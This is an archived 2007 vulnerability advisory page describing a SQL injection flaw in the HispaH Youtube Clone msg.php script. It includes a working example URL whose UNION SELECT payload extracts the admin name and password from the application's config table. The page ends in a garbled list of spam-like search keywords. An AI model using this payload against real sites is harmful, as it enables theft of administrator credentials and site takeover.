about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , HispaH Youtube Clone MSG.PHP Script SQL Injection Vulnerability


Title HispaH Youtube Clone MSG.PHP Script SQL Injection Vulnerability
Published 2007-07-01-12:00AM
Updated 2007-07-04-03:47PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  t0pP8uZz and xprog are credited with the discovery of this vulnerability.
Vulnerable  HispaH Youtube Clone 0
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following example was provided:

http://www.example.com/path/msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E616765,convert(concat((SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F70617373))/**/using/**/latin1),4,5,6,7,8,9/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 09:41:35 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ANJLINAJOL news for C sadha sex rapping du PHP Advanc redaxo/inc Tamil+Sex+ ddox exploit 2. www.hnhcjq maemo guest book THIRSHA SE www.zoo se PhpBB%2B2 maxcpm.inf Haifa sax Trisha sex administra H...a/bugg /search/ex www.zoo se desi hot v PHPHTML.ht Www.89.com WWW.Sex18. t39t brooke bur phpHtmlLib www.tarzan Www.livese Boob 3gp KadNm Free downl arab sex t TR/WLHack. Www.Sex5g. nice maxcpm.inf search/exp news for c news for c netbsd 1.6 Play clip www.galadi @www,sex.c chainessex mysql expl English ph www.hhlsw.